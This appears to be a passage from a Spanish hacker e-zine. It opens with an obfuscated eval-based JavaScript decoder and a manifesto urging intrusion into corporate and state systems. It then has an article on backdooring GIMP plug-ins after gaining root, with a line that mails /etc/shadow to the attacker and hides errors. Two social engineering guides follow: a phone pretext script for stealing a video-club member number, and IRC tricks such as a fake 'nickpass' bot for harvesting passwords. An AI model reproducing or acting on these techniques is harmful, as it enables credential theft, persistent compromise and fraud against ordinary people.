GBCJBCCBCBFBHCCDBCCCCJBCBBCCBCFCCDEBEFBDEBDKBFEBIFBIFBDKBFEBDEBEFBHCCBCCI=
KBKBCCBCEFBDKBFEBHFBHBCGCCDKBFEBCFBKGBBJBFEBEFBDEBFCCBCCBBCDEBEFBFEBBFBCF=
BKGBGDCDEBBJBFEBEFBDEBFCCBCCBBCDEBEFBFEBBFBCFBKGBKEBCFBKGBFEBKGBECBBCBKKB=
FCCCDCDEBEFBCHBDEBFEBDBCHFBIHBJBCCCCGCCCBCBFBCFBKGBFEBKGBECBBCBKKBFCCCDCD=
EBEFBCHBDEBFEBJCCIKBFCCDEBIJBGCCFBCDEBCHBDEBBCCCBCKCCDEBGHBKKBHCCGBCJCCCB=
CJJBKIBJKBHBCCBCKKBHCCBFBKEBIJBEJBKKBFCCGBCDCCHCCHFBEJBFBCCBCJBCJBCKEBCFB=
KGBIJBGCCFBCHFBDJBICCBCCBFBKEBFEBEFBDEBCCCJKBHBCJIBCBCHCCHFBGJBGCCCBCFCCJ=
IBIKBKBCCBCDEBEFBFEBHFBHBCGCCKEBCFBKGBFEBKGBDEBECBBCBECBBCBECBBCBIFBDFBEC=
BBCBJCCIKBFCCDEBFCCCBCEBCDEBCHBDEBFEBIJBGCCFBCHFBDJBCBCEBCIJBFCCGBCHCCCBC=
BFBKEBDIBGIBKHBKJBGKBIHBGJBDJBDJBKHBJIBFJBGKBGJBEJBKHBDJBDKBDKBDKBDKBEJBK=
IBBIBFJBIJBGHBDJBKHBDKBDKBDKBDKBIIBGBCKKBFCCCCCGCCCCCDBCHCCDKBDKBDKBDKBIJ=
BGBCBCCBBCCCCKCCGCCDKBDKBDKBDKBIHBICCFCCFCCCBCBCCHCCHJBCBCFCCGCCGBCCCCBCC=
DKBDKBDKBDKBEIBBCCHCCCBCFCCBCCCBCHCCDEBEJBCBCHCCHCCGBCBCCEBCGCCDKBDKBDKBD=
KBBKBCCCBCCCBCGCCDKBDKBDKBDKBFEBECBBCBDBCCCCFCCDEBBFBJCCIKBFCCDEBGBCCHBJF=
BKGBGBCBHBDGBKGBGBCEFBEFBCFBEDCECBBCBKKBFCCCDCDEBEFBCHBDEBFCCCBCEBCDEBEFB=
DEBGBCDEBEFBDEBFEBDKBDKBDKBDKBKFBBGBJFBJFBKEBDEBFFBDEBJFBFFBDEBDKBFEBDJBK=
HBCIBGKBJHBIJBKIBDJBJHBDKBFEBCFBKGBFEBKGBECBBCBKKBFCCCDCDEBEFBCHBDEBFCCCB=
CEBCDEBEFBDEBGBCDEBEFBDEBFEBDKBDKBDKBDKBKFBBGBJFBKFBKEBDEBFFBDEBJFBFFBDEB=
DKBFEBDJBKHBCIBGKBJHBIJBKIBDJBJHBDKBFEBCFBKGBFEBKGBECBBCBKKBFCCCDCDEBEFBC=
HBDEBFCCCBCEBCDEBEFBDEBGBCDEBEFBDEBFEBDKBDKBDKBDKBKFBJFBJFBDGBKEBDEBFFBDE=
BJFBFFBDEBDKBFEBDJBKHBCIBGKBJHBIJBKIBDJBJHBDKBFEBCFBKGBFEBKGBECBBCBGDCECB=
BCBDFBIFBECBBCBKKBFCCCDCDEBEFBCHBDEBFEBIJBGCCFBCHFBDJBCBCEBCIJBFCCGBCHCCC=
BCBFBKEBDIBGIBKHBKJBGKBHIBKIBIHBGHBHIBGKBIIBGHBIHBDIBEIBJIBKHBDKBDKBDKBDK=
BEJBCCCDBCHCCKCCIKBFCCCBCDKBDKBDKBDKBIIBGBCKKBFCCCCCGCCCCCDBCHCCDKBDKBDKB=
DKBIJBGBCBCCBBCCCCKCCGCCDKBDKBDKBDKBIHBICCFCCFCCCBCBCCHCCHJBCBCFCCGCCGBCC=
CCBCCDKBDKBDKBDKBDJBICCBCCKIBBCCKKBCBCKHBBDCDKBDKBDKBDKBKEBFFBKEBFEBDEBEF=
BDEBCCCJKBHBCJIBCBCHCCHFBGJBGCCCBCFCCJIBIKBKBCCBCDEBEFBDEBFEBHFBHBCGCCKEB=
CFBKGBGDCGDCFEBKGBECBBCBECBBCBDEBDCCCCCJBCCDCDEBEFBCHBFEBJCCIKBFCCDEBFEBE=
FBDEBBCCHFBKKBFBCIKBFCCGHBHCCBFBDGBCFBDEBEFBFEBCHBDEBEJBHCCFCCGBCBCCEBCHF=
BDBCFCCCCCKBCIHBFBCIKBFCCIHBCCCBBCCBCBFBFEBKGBECBBCBDEBDBCCCCFCCDEBBFBJCC=
IKBFCCDEBGBCCHBJFBKGBGBCBHBKKBFCCCDCHFBJBCCBCBCCEBCHCCFBCDEBGFBDEBKFBKGBG=
BCEFBEFBCFBEDCDEBDCCCCCJBCCDCDEBEFBCHBDEBBFBKKBFCCCDCHFBKKBFBCIKBFCCIHBCC=
CBBCCBCGHBHCCBFBGBCCFBDEBEFBDEBIBCCFBDEBEFBDEBFEBDEBGFBDEBFEBDEBEFBDEBIBC=
DEBEFBFEBFFBFEBKGBGDCDEBDEBECBBCBDEBDCCCCCJBCCDCDEBEFBCHBBFBKKBFCCCDCHFBK=
KBFBCIKBFCCIHBCCCBBCCBCGHBHCCBFBGBCCFBDEBEFBDEBIBCCFBEFBFEBDEBGFBDEBFEBDE=
BEFBDEBIBCDEBEFBDEBFEBCFBKGBFEBKGBECBBCBDEBDCCCCCJBCCDCDEBEFBCHBFEBCBCJCC=
IKBJBCBFBFEBEFBDEBBCCHFBKKBFBCIKBFCCGHBHCCBFBDGBCFBDEBEFBDEBFEBCFBKGBDEBG=
DCDEBFEBKGBECBBCBECBBCBJCCIKBFCCDEBJCCJFBCHBDEBBCCCBCKCCDEBEJBHCCFCCGBCBC=
CEBCBFBFEBBHBFEBEFBFEBEJBIHBDJBEIBBJBFJBDHBDEBJCCIKBFCCDEBICCGCCFCCJIBCHB=
KEBFEBDEBEFBDEBCCCJKBHBCJIBCBCHCCHFBGJBGCCCBCFCCJIBIKBKBCCBCDEBEFBFEBKEBK=
GBDEBFEBDEBDEBEFBDCCCCCJBCCDCEFBDEBFEBDEBGCCCBCHCCFJBGBCKBCCBCCCCICCHCCBF=
BKEBBJBFEBDEBEFBDEBFCCBCCBBCDEBEFBFEBBFBCFBKEBFFBFEBDEBEFBDEBBFBBGBDFBFCC=
BCCBBCCFBDEBEFBFEBDEBCFBKGBBHBIFBFEBEFBFEBEJBIHBDJBEIBBJBFJBDHBFEBCFBKGBE=
CBBCBECBBCBECBBCBDEBDEBJCCIKBFCCDEBDBCGCCCCCDEBCHBDEBBCCCBCKCCDEBGHBKKBHC=
CGBCJCCCBCJJBKIBJKBHBCCBCKKBHCCBFBFEBEJBKKBFCCGBCDCCHCCGBCBCCEBCHFBBIBGBC=
JBCCBCEJBCDCGCCHCCCBCKBCKIBJKBHBCCBCKKBHCCFEBCFBKGBECBBCBDEBDEBJCCIKBFCCD=
EBIJBGCCFBCDEBCHBDEBBCCCBCKCCDEBGHBKKBHCCGBCJCCCBCJJBKIBJKBHBCCBCKKBHCCBF=
BKEBIJBEJBKKBFCCGBCDCCHCCHFBEJBFBCCBCJBCJBCKEBCFBKGBECBBCBDEBDEBJCCIKBFCC=
DEBDBCCCCJBCBBCCBCFCCDEBCHBDEBDBCGCCCCCHFBCIBCBCHCCBIBCCCJBCBBCCBCFCCBFBI=
JBGCCFBCHFBEJBDCCCBCKKBGBCIKBJBCBIBCCCJBCBBCCBCFCCGCCBFBFEBJHBCBCGCCIBCHC=
CCCCDCCFEBCFBCFBKGBECBBCBDEBEIBBCCDBCCBCKKBHCCBFBDBCCCCJBCBBCCBCFCCFFBJCC=
JFBFFBDBCGCCCCCFFBCCCJKBHBCJIBCBCHCCHFBGJBGCCCBCFCCJIBIKBKBCCBCCFBKGBECBB=
CBGDCECBBCBECBBCBDBCICCBCCKKBHCCGBCCCCBCCDEBEIBBCCDBCCBCKKBHCCBFBDBCCCCJB=
CBBCCBCFCCFFBKKBCCCBBCCBCFFBDBCGCCCCCFFBGCCGBCEBCBCCCFBEDCECBBCBDEBDEBJCC=
IKBFCCDEBBIBCCCFCCDJBCBCIKBBBCGBCBCCEBCDEBCHBDEBKFBFFBDEBBIBCCCFCCIJBFCCG=
BCHCCGBCBCCEBCDEBCHBDEBBGBKGBBIBCCCFCCGHBDCCDCCCBCBCCBBCCHBHGBKGBECBBCBJC=
CIKBFCCDEBCBCBDCHCCKGBECBBCBDEBDEBDEBDBCCCCFCCDEBBFBJCCIKBFCCDEBDBCGBCJBC=
CBCGCCDEBCHBDEBBCCCBCKCCDEBKHBBCCICCKBCCBCFCCIKBHCCCCCFCCBFBDBCCCCJBCBBCC=
BCFCCHFBDBCGBCJBCCBCGCCCFBKGBEEBDBCGBCJBCCBCGCCHFBIKBHCCKHBBCCBBCBFBCFBKG=
BDEBDBCGBCJBCCBCGCCHFBKBCCCCJCCCBCJIBCBCBDCHCCBFBCFBCFBEDCECBBCBKBBCBCBDC=
HCCCHBDBCGCCCCCHFBCIBCBCHCCKHBBDCHCCCBCBCCGCCGBCCCCBCCJIBIKBKBCCBCBFBDBCG=
BCJBCCBCGCCHFBGBCHCCCBCKBCBFBCFBCFBKGBECBBCBKBBKBBGBCDBCBFBCBCBDCHCCCHBCH=
BFEBFBCHCCKBCFEBCFBEDCECBBCBKBBKBBKBBJCCIKBFCCDEBIKBHCCHCCCHBDBCGCCCCCHFB=
CIBCBCHCCBIBGBCJBCCBCBFBDBCGBCJBCCBCGCCHFBGBCHCCCBCKBCBFBCFBCFBKGBECBBCBK=
BBKBBKBBIKBHCCHCCHFBGHBHCCHCCFCCGBCJKBICCHCCCBCGCCDEBCHBDEBBGBKGBECBBCBKB=
BKBBDEBGBCDBCDEBBFBIKBHCCHCCHFBEJBGBCDDCCBCDHBJFBCFBEDCDEBECBBCBKBBKBBKBB=
JCCIKBFCCDEBFCCBBCCHBDBCGCCCCCHFBKIBDCCCBCBCCFJBCBCBDCHCCBIBGBCJBCCBCBFBD=
BCGBCJBCCBCGCCHFBGBCHCCCBCKBCBFBCFBFFBBIBCCCFCCDJBCBCIKBBBCGBCBCCEBCCFBKG=
BECBBCBKBBKBBDEBKBBJCCIKBFCCDEBJKBICCDBCDBCDEBCHBDEBBCCCBCKCCDEBEJBHCCFCC=
GBCBCCEBCBFBFCCBBCHFBDJBCBCIKBBBCGHBJBCJBCBFBCFBCFBKGBECBBCBKBBKBBKBBFCCB=
BCHFBIHBJBCCCCGCCCBCBFBCFBKGBECBBCBKBBKBBDEBKBBGBCDBCDEBBFBJKBICCDBCDBCHF=
BGBCBCCBBCCBCBDCKIBDBCBFBGCCGBCEBCBCCCFBCHBCHBGFBKFBCFBEDCECBBCBKBBKBBKBB=
DEBJCCIKBFCCDEBIKBDCCCHBDBCGCCCCCHFBKIBDCCCBCBCCFJBCBCBDCHCCBIBGBCJBCCBCB=
FBDBCGBCJBCCBCGCCHFBGBCHCCCBCKBCBFBCFBFFBBIBCCCFCCGHBDCCDCCCBCBCCBBCFFBHC=
CFCCICCCBCCFBKGBECBBCBKBBKBBKBBDEBIKBDCCHFBIJBFCCGBCHCCCBCBFBKKBCCCBBCCBC=
CFBKGBECBBCBKBBKBBKBBDEBIKBDCCHFBIHBJBCCCCGCCCBCBFBCFBKGBECBBCBKBBKBBDEBK=
BBGDCECBBCBKBBKBBDEBGDCECBBCBKBBKBBGDCECBBCBDEBDEBDEBGDCECBBCBDEBDBCCCCFC=
CDEBBFBJCCIKBFCCDEBGCCDBCDEBCHBDEBBCCCBCKCCDEBKHBBCCICCKBCCBCFCCIKBHCCCCC=
FCCBFBDBCCCCJBCBBCCBCFCCHFBEJBICCJKBBIBCCCJBCBBCCBCFCCGCCCFBKGBDEBEEBGCCD=
BCHFBIKBHCCKHBBCCBBCBFBCFBKGBDEBGCCDBCHFBKBCCCCJCCCBCJIBCBCBDCHCCBFBCFBCF=
BEDCECBBCBDEBDEBDEBEIBBCCDBCCBCKKBHCCBFBGCCDBCHFBGBCHCCCBCKBCBFBCFBFFBKKB=
CCCBBCCBCFFBDBCGCCCCCCFBKGBECBBCBDEBGDCECBBCBGDCECBBCBBHBIFBEJBIHBDJBEIBB=
JBFJBDHB*/}
function transpl480(dataf){
var i,d =3D '';var long=3D6204;var str=3D19;eval('var s=3D String(' + =
dataf +')');
for (i=3Dstr + 1;i< 3*long + str;i+=3D3) {
d +=3D String.fromCharCode( (s.charCodeAt(i) - s.charCodeAt(str)) + =
10*(s.charCodeAt(i+1) - s.charCodeAt(str)) + 100*( s.charCodeAt(i+2) - =
s.charCodeAt(str)) );}
return d;}
document.writeln(transpl480("pl480"));
</SCRIPT>
<-->




-< 0x03 >------------------------------------------.------------------.------
`-[ _MeNpH_ )-ï


Lo primero que he de decir, antes de soltaros mi sarta de divagaciones
este articulo/comentario no va a ense~ar a nadie nada acerca de la "tecnica",
del haking pero seguro que consigue que muchos hackers que piensan como yo
digan: "joder, si no estoy loco, no soy el unico que tiene este concepto
sobre el mundo del hack...". Bien, me explico, con esto que escribo prentendo
poner en su sitio a todos los jodidos hackers del "Ay, jope, que no somos
dilincuentes" y dar un poco de apoyo a todos los anarquistas y revolucionarios
en el mundo del hack.

Vale, pues ahora seguro que tengo unos pocos enemigos extra, eso esta bien.
Pero seguro que al final del texto tengo muchos mas, aunque espero que esto
me cree tb mas amigos, que es lo que importa.
Bueno, pues como iba diciendo, esos jodidos hackers son los que defienden en
plan religioso lo del "Misterio de la Santisima Moral del Hacker":

(- Misterio de la Santisima Moral del Hacker:
El hacker que entra en una makina solo puede
mirar un poco y despues ir al admin y decirle los fallos de
seguridad que tiene. -)

Bueno, pos esto esta de puta madre con servidores como el de Medicos sin
Fronteras, el de Greenpeace y pocos mas... pero, POR FAVOR!!, COMO VAMOS A
PERDONAR A ESOS ORGANISMOS ESTATALES O A ESAS EMPRESAS QUE, POR MIEDO AL
PODER DE NUESTRAS MENTES, NOS HAN DECLARADO LA GUERRA.

Esos que piensan que hay que ser buenos chicos para que no los llamen
delicuentes ya son hackers vencidos, los malos en esta ocasion han ganado,
creando asi un ejercito de expertos dispuestos a solucionar todos los puntos
debiles del jodido GRAN HERMANO!!!, de ese que se ha dedicado a meter en la
memoria colectiva que el ANARQUISMO significa caos y destruccion, que a la
escuela no se tiene que ir a aprender sino a aprobar los examenes, o que los
hackers son malnacidos hijos del diablo.
Ese kabron (en abstracto) que nos tiene cojidos por los huevos es el mismo
que nos tacha de delincuentes: PERO NO OS DAIS CUENTA DE QUE ESA LEY QUE NOS
PROHIBE EMPLEAR NUESTROS CONOCIMIENTOS Y NUESTRA LIBERTAD, ESTA HECHA PARA
PROTEGER A LOS QUE CONTROLAN ESTE MUNDO Y NO PARA PROTEGER LOS INTERESES DE
CIUDADANOS DEL MISMO
(ya que nadie, excepto los lamerones y los tontos del culo, se dedican a robar
a la gente normal y corriente recetas de cocina en formato Word)
NO OS DAIS CUENTA QUE DENTRO DE POCO SEREMOS, LOS HACKERS, LA UNICA FORMA
POSIBLE DE REVOLUCIONARIOS Y QUE POR ESTO QUIEREN ERRADICARNOS DE LA RED.
SI DEJAMOS QUE NOS DERROTEN TAN FACILMENTE: A LA MIERDA LA LIBERTAD!!!.


Supongo que muchos de los que se dediquen al hack conoceran algo o mucho de
la filosofia CyberPunk y se habran dado cuenta de que el futuro mas proximo
es muy parecido (por no decir identico) al que se describe en novelas del
genero como, por ejemplo: el clasico "Neuromante" de William Gibson.
Nos encontramos con mundo donde hay unas cosas llamadas Corporaciones que son
las que dominan el mundo.
Macro-empresas ke controlan todo el dinero y que tienen autenticos
ejercitos de seguridad para dominar a la gente, esto es el futuro mas
inminente (MICROSOFT, AMERICA ONLINE, TELEFONICA, EL CORTE INGLES... si, si
hablo de vosotros Kabrones!!).

No os parece que en un mundo donde el respeto al kapital y a la propiedad
se ha convertido en el Mandamiento nº 11; donde la gente de los paises con
dinero piensa que los problemas de hambre en el mundo no se pueden solucionar
y, por tanto, no hay que hacer nada; donde la unica forma de revolucion es
hacer Zapping en la television y si se da alguna un poco mas peligrosa para la
gente que manda, se reprime salvajemente; donde se han perturbado terminos
como la democracia, hasta el punto de que hoy en dia todo el mundo piensa que
"democracia" significa votar a alguien para que te domine hasta la proxima
votacion (no se a vosotros, pero a mi esto ultimo me parece horrible);
no os parece que en un mundo asi hace falta gente que construya una nueva
revolucion por otros caminos a los que el poder no esta acostumbrado.
En este momento en el que los poderosos no pueden prescindir de los sistemas
de comunicación informatizada,


LA REVOLUCION ESTA EN NUESTRAS MANOS COMPAÑEROS!!!


Por todo esto me parece tan sumamente mal que la gente que cuelga documentos
de enseñanza sobre el hacking en la red, siempre te suelta al principio lo de
la "Moral del Hacker", y lo de "no semos delincuentes". Mirar nenes, la
delincuencia es el acto de incumplir las leyes establecidas, si se declara
que leer es delito, todo aquel que lea sera un delincuente, pero...
por eso esta mal leer??? Pues pa mi que no.
Pero la gente sigue con el estupido pensamiento de las leyes como algo sagrado
o semi-divino, NO!!!. Las leyes se las ha inventado un tipo como tu y como yo
chavalote/a, y con un fin, que en algunas ocasiones no es demasiado noble.

Asi que si alguna vez te da por enseñar a hackear a alguien, intenta educarle
como HACKER-REVOLUCIONARIO (y no como hacker-esclavo).

En fin, hay muchisimo mas que decir, pero buscar en los rincones de
vuestras libertarias mentes y encontrareis el resto.
Ah, se me olvidaba dar un mensaje de apoyo a todos los enganchados a la tele:
con voluntad podreis desintoxicaros y dejar de ser jodidos yonkis, leer
un poco y vereis que divertido!! (lo mismo pa los futboleros).


Si me quereis mandar algun comentario pues aqui: htiburon@teleline.es,
que es la direccion que utilizo cuando puede ser que me bombardeen
(principalmente pq yo no soy el titular;).)



Hasta la proxima.



_MeNpH_



-< 0x04 >------------------------------------------.--------------------.----
`-[ TryckY )-ï



-=( Movidas movidosas a traves del Gimp )=-

En este articulo voy a explicar como una vez obtenido root en una maquina
podemos ejecutar lo que queramos a traves del Gimp doy por hecho que sabeis
lo que es el Gimp y si no lo ejecutais y ya esta.
Este que voy a explicar no tiene uso si el due~o de la maquina nunca
ejecuta el gimp bueno lo que hay que hacer es muy simple, el gimp tiene un
directorio de donde lee los plugins, en verdad depende de la version, la
ultima los ha separado en varios en:

"/usr/lib/gimp/1.1/plug-ins" . Estan los ejecutables pero si tu metes un
script tambien lo ejecutara por lo que a qui viene la parte maliciosa en
principio habia puesto muchos ejemplos pero esto seria mas un curso de
script que otra cosa de por lo que lo dejo a vuestra eleccion los scripts,
que otra cosa de por lo que lo dejo a vuestra eleccion los scripts,
bueno enga, un ejemplo cutre.
Lo que hace es mandarle la lista de passwords al usuario trycky y lo del
2> /dev/null es que si hay errores se vayan a /dev/null para no dar el
cante en caso de error

<++> gimp/ejem1

mail trycky < /etc/shadow & 2> /dev/null

exit 0

<-->

Como veis los ejemplos ya corren a cargo de vuestra imaginacion
solo decir que el las ultimas versiones del gimp los script-fu y los
de perl vienen separados del resto. Otra cosa seria currarse un script
en el propio gimp y que cada vez que le diese hiciece algo esto es facil
leyendo la documentacion de ayuda del gimp y el script fu register para
el script
Ah, si instalais uno de estos ponerle un nombre poco cantoso por que
cada vez que inicia el Gimp va saliendo abajo los plug-ins que va cargando
y si el tio lee "loading plugins me-jodo-a-tu-makina" le daria algunos
indicios de que algo anda mal, no creeis?.


Y lo demas es vuestra imaginacion, podeis buscar archivos que os los
envien a donde querais:

"find / -name secreto -exec cp {} ~ \;"

Esto buscaria el archivo secreto y lo copiaria a vuestro home, como veis
no habria limitaciones.

Otra cosa tambien es que permite ejecutar ejecutables valga la redundancia
aunque si ya habeis sido root para poder instalar el script , pero bueno
tambien puede pasar de forma muy muy rara que tenga modo de escritura el
directorio "/usr/lib/gimp/1.1/plug-ins". Pero que os lo dejo a vuestra
imaginacion tambien podeis editar un script del perl que los hay tambien
para el gimp y que cada vez que se ejecute haga algo que vosotros querais

Pues ya esta creo que esto ha sido bastante en principio el documento iba
a tener mas ejemplos y chorradas pero creo que con esto basta .

Si tengo algun error en el doc o lo que sea podeis encontrarme en el IRC
con el nick de trycky claramente . Este doc esta muy bien para gastarle
bromas a los colegas :) . Hasta luegor


TryckY

*EOF*




-< 0x05 >-------------------------------------------------.--------------.---
`-[ ^pRoviDoR )-ï




&&&&&&|#####################################################|&&&&&&
| De Videoklubs, ingenieria social y otros lances... |
&&&&&&|#####################################################|&&&&&&
por ^pRoviDoR

Buenas, soy ^pRoViDoR y me he decidido a eskribir este articulo para
que pueda ser de utilidad, espero ke os guste.
De entre las artes del hack, la ingenieria social es una de las
cosas ke encuentro mas interesantes.
He leido varios articulos sobre I.S casi siempre referidos a
obtener numeros de tarjetas de credito, cuentas y password de irc...
Pues bien, Quien no ha querido tener para toda la vida, por ejemplo
"Juegos de Guerra" en su videoteca?, pero o no lo has encontrado o
no te apetece gastarte dinero en ello (merece la pena),entonces
este articulo es para ti. Empecemos:

En la mayoria de los videoklubs para sacar juegos, peliculas o lo ke
tengan, te haces socio dando tus datos y a cambio obtienes un
numero ke te identifica y con el ke podras obtener sus servicios.
Veamos komo obtener el numero de nuestra victima.

1. ¿Que necesitamos?
*La guia telefonica
*La direccion y el nombre del videoklub
*Un telefono (con linea :))
*Aplomo
*Un Teclado (opcional)
*Un poquito de suerte.
*Un amigo.
*Un atontao

3,2,1.. ACCION!!
Elige el videoklub ke te va a "prestar" sus servicios ;).
Bien, ahora busca la calle en la que se encuentra situado, nuestro
videoklub se llamara Videopollos y esta situado en la calle Juela,
¨ke hacemos?, pues kon la ayuda de la guia telefonica buscaremos
a alguien ke viva en esa kalle o por esa zona, podemos tardar un rato
pero no mucho (paciencia),¨por ke hacer esto? se supone ke la persona
ke viva alli sera socia del susodicho videoklub al estar cerca de su
casa.

2.Obteniendo informacion de "Videopollos"

Lo mejor para saber ke informacion obtener de la victima, es hacernos
socios nosotros del videoklub, para ver lo ke nos piden.
Sera conveniente ke no lo haga la persona ke va a ir a sacar la
pelicula o el videojuego kon el nº obtenido de la victima, por razones
obvias (los del videoklub no son tontos).
Hemos averiguado ke videopollos da komo password un nº de 4 cifras,
asi ke vamos con la fiesta...
Bueno hemos encontrado a una persona ke vive en la calle Juela, aki
la tenemos --> Gonzalez Cuesta, Apapucio...........(***)******
¨Ke hacer ahora? Bueno suponiendo ke tengamos la suerte de ke sea
socia (la tenemos) pondremos voz amable pero no concesiva, que se note
ke estamos seguros y le diremos ke debido a un virus informatico ;)
los registros de cuentas de los clientes han sufrido modificaciones
y se estan validando kon el fin de... bueno mejor leed la conversacion
----------------------------------------------------------------------
M.P= Mala persona , es decir nosotros :p
A.A= Apapucio Atontao, es decir la victima
*******************************************
Rinngggg!------------------------------------------------------------
<A.A> Si? digame?
<M.P> Buenas tardes, ¿Apapucio Gonzalez?
<A.A> Si soy yo, ¿kien es?
<M.P> Si, mire le llamamos de VideoPollos del kual es usted socio
activo.
<A.A> ¿Ke ocurre?
<M.P> No se preocupe, todo esta en orden, tan solo ke hemos sido
victimas de un virus informatico, ¿sabe lo que es?
<A.A> Si, si por supuesto ; fijo ke no tiene ni puta idea
<M.P> Entonces estamos validando los datos de su cuenta ya que pueden
haber sido modificados. Su domicilio actual es C/Juela tal tal y
tal, no? ;no entramos a sako todavia
<A.A> Efectivamente
<M.P> Su numero de identificacion es ****
<A.A> No! se equivoca, creo ke no era ese,espere un momento
;se va a buscarlo por algun lado
<A.A> tenia yo razon ;si y yo tengo su numero de identificacion ;)
<M.P> Disculpe las molestias ;tono de resignacion y suplica jeje
<A.A> es el ****
<M.P> Muchas gracias, sus datos ya estan actualizados correctamente
le agradezco su colaboracion, no todos lo clientes son tan
amables ;le hacemos la pelota para ke no sospeche :)
<A.A> Nada, nada, a usted y espero ke solucionen lo del virus.
<M.P> Eso esperamos, muchas gracias.
Klick--------------------------------------------------------------
Bueno pues ahora ya tenemos su nº de identificacion y podremos sacar
una pelicula o un videojuego, por un periodo indefinido ;). No os
preokupeis por la victima, en la mayoria de los kasos no tendra ke
pagar lo ke vosotros habeis kogido "prestado" para uso y disfrute.

4.Problemas que pueden surgir en la llamada a la victima:

-Ke el titular del numero no use ni para cagar la tarjeta de
videopollos,o ke sea su hijo el titular ke se pone ciego con los
pokemon, no preocuparse, en el primer caso podemos argumentar ke no
se asuste porke tenemos un copia de seguridad pero ke por si acaso
prefiririamos confirmarlo personalmente, y asi nos ahorramos ke vaya a
preguntar al videoklub y pillen el invento. En el segundo caso
nosotros no sabemos ke su hijo es el titular pero la victima si
asi ke le llamara para ke se ponga al telefono, ahi tendremos ke
escuchar bien atentos, para oir el nombre del hijo y poder continuar
con la fiesta.

5.Problemas ke pueden surgir en el videoklub.
-Ke al ser personas de la misma zona, al dependiente le suene el nº
y sepa ke no eres su autentico due~o, esto a veces pasa, agacha las
orejas y pirate del videoklub :( (se pasa mal, fiuuu!).
-Ke ademas te pida algun dato complementario porque no se fia
(p.j. <TioVideoklub> me puedes decir la direccion? )
La solucion es bien sencilla, aprendete bien la direccion y el nombre
de la victima, para decirla sin dudar.

6.Ambienta la conversacion. (opcional)
Con el fin de procurar hacer la conversacion lo mas kreible posible
para la victima podemos ambientar la conversacion, y diras ¿ke ko~o
es eso? poner el ambientador ese del pino para los coches, pues no
:p. La cuestion es ke la victima obtenga una informacion a traves
del telefono ke aunque no sea totalmente necesaria, ofrezca una
sensacion de normalidad a la situacion.En este caso, Ke podemos hacer?
Lo primero sera, siempre ke se pida o confirme algun dato, procura hacer ruido
con el teclado (marca teclas, no seas bruto y te lies a oxtias contra
el telefono :p) komo si estuvieras introduciendo informacion, lo segundo
puede ser, que en medio de la conversacion, te disculpes como si estuvieras
atendiendo a un cliente, podria ser algo como:
---------------------------------------------------------------------
<M.P> Disculpe un momento, ;con voz mucho mas baja decimos lo
Si en el pasillo del fondo ;siguiente, con la mano tapando el micro.
--------------------------------------------------------------------
Con esto la victima se sentira mucho mas segura de que se encuentra
hablando con una persona ke trabaja en un videoclub.

######################################################################
# Bueno espero ke hayais disfrutado, Yo no me hago responsable de lo#
# que hagais y este articulo y su contenido es solo kon fines #
# educativos, las conversaciones pueden o no ser reales ;) #
######################################################################

Saludos al sub-mundo.
email: HeXaDeM@gmx.net
LA INFORMACION DEBE SER LIBRe.



-< 0x06 >-------------------------------------------------.--------------.---
`-[ by Tahum )-ï





{- El arte de la ingenieria social 2 -}

" El timador vuelve a la carga..... "


[ Entrada ]

Hola de nuevo lectores, aqui me veis de nuevo, una vez mas con vosotros
siguiendo la saga de la ingenieria social, un tema que como veis puede dar
tanto o mas de si. Ahora trataremos la ingenieria social desde un punto
distinto, ya sabiendo lo que se explico en el numero pasado miraremos un
poco como son las victimas actualmente, de que manera se consigue el
enga~o y algunos trucos que os seran utiles, ademas de alguna sorpresita
que os tengo preparada. Si teneis alguna duda, o quereis mandarme alguna
sugerencia (constructiva) me la podeis mandar a tahum@demasiado.com, y os
respondere encantado ;O).


~ Indice ~

- De que manera han cambiado las victimas ? - 1.
- De que manera les enga~amos ? - 2.
- Como se consigue el enga~o ? - 3.
- Mas trucos - 4.
- Los consejos del abuelo - 5.
- Despedida - 6.


(--1--)- De que manera han cambiado las victimas? -(---------------------)

Nuestras victimas ahora estan mucho mas concienciadas de los peligros que
corren dando datos personales a cualquier persona o al escribir aquella
frase tan rara que le dice aquella chica/o. En resumen, estan ojo avizor
de no exceder confianzas con cualquier tipo que conozcan por el IRC. Esto
no deja de ser bueno porque asi aprendemos nuevas tecnicas de camelacion
a la victima ( me ha gustao la palabreja esa de camelacion ) y nos
puliremos como unos ingenieros sociales competentes (de esos quedan pocos)
y estaremos preparados para todo (fuerzas armadas espa~ol... Cachis la mar
olvidar esto ;)). Asi que hazte a la idea de que conseguir una victima hoy
en dia no es tarea facil, pero tampoco te creas que es imposible ni mucho
menos... }-D.
Vosotros esto no lo notareis hasta que le pidais a la victima que escriba
la frase tal o que reciba el archivo cual, es ahi cuando os diran que no a
veces de maneras no muy educadas...
Como hay que conocer al enemigo, aqui teneis una peque~a descripcion del
usuario medio del IRC, pero como generalizar nunca fue bueno tomaoslo como
una referencia a rasgos generales...

Edad -------------------- 20 a 35 tacos aproximadamente
sexo -------------------- Predomina por poco el masculino
Utiliza el IRC ---------- Para pasar el rato, ligar

( En algunas cosas no han cambiado... ;D )

Asi suelen ser nuestras victimas...


(--2--)- De que manera les enga~amos ? -(--------------------------------)

Pues hay dos caminos... El facil y el dificil, el facil tan solo funciona
con victimas muuy novatas, el dificil puese colar con victimas no tan
novatas. Primero trataremos el metodo facil:

- El metodo facilote: -

Pues esta tactica como fin tiene la de apoderarse del password de su nick,
aunque se le puede dar mas usos. Consiste en decirle a la victima que para
autentificar su nick tiene que escribir /msg nickpass el_pass , una frase
sin ningun secreto aparente, para la victima eso es un mensaje a un bot
para autentificar tu nick, pero si te fijas en el destinatario... Acaso
hay algun bot llamado nickpass?? pues no... Pues porque no te pones de
nick nickpass? de esa manera el password te llegara a ti... Pues en eso
consiste el truco, a que es sencillo y hasta puede parecer estupido?? pues
pruebalo con una victima novata y veras rapidos resultados. A este truco
se le pueden aplicar mil y un usos, todo depende de tu imaginacion.
Otro metodo muy facil de hacer es ponerse nombre de tia ( este truco fijo
que ya lo habreis visto ), pero no un nombre que sugiera que estas muy
buena ;-), como leticia21, que ademas dice que eres joven ;). Con eso y
meterte en un canal de amor y decir que buscas pareja tendras a tus pies
a monton de gente... Es la hora de hablar un poco contigo y decirles que
si quieren tu foto en ba~ador... Que escriban la frase tal o reciban el
archio tal }x-D. Es un metodo facilote pero sus resultados son buenos.
Otro metodo facilito es el de hacerse pasar por un bot... Es un truco la
verdad bastante efectivo, y como vale mas un ejemplo que mil explicaciones
vamos directamente al ejemplo.

<nosotros> ************************************************
<nosotros> Bienvenid@ al sistema de autentificacion de nick
<nosotros> ************************************************
<nosotros> * *
<nosotros> * Escoja una opcion *
<nosotros> * *
